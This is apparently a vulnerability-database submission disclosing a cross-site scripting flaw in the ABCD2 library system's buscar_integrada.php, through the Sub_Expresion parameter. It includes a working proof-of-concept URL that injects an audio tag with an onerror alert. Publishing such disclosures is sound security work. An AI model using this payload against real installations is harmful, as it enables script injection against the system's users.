| Title | ABCD Community ABCD2 2.x Cross Site Scripting |
|---|
| Description | There is a Cross Site Scripting (XSS) vulnerability in buscar_integrada.php file, using the parameter Sub_Expresion.
Example: https://XXXXX/opac/php/buscar_integrada.php?lang=pt&base=acervo&modo=1B&alcance=and&Opcion=libre&prefijo=TW_&Sub_Expresion=MG_00056fas%3Caudio%20src/onerror=alert(1)%3E |
|---|
| Source | ⚠️ https://github.com/peritocibernetico/ABCD_Vulnerabilities |
|---|
| User | peritocibernetico (UID 74140) |
|---|
| Submission | 08/27/2024 20:52 (2 years ago) |
|---|
| Moderation | 09/04/2024 10:39 (8 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 276491 [ABCD ABCD2 up to 2.2.0-beta-1 /buscar_integrada.php Sub_Expresion cross site scripting] |
|---|
| Points | 18 |
|---|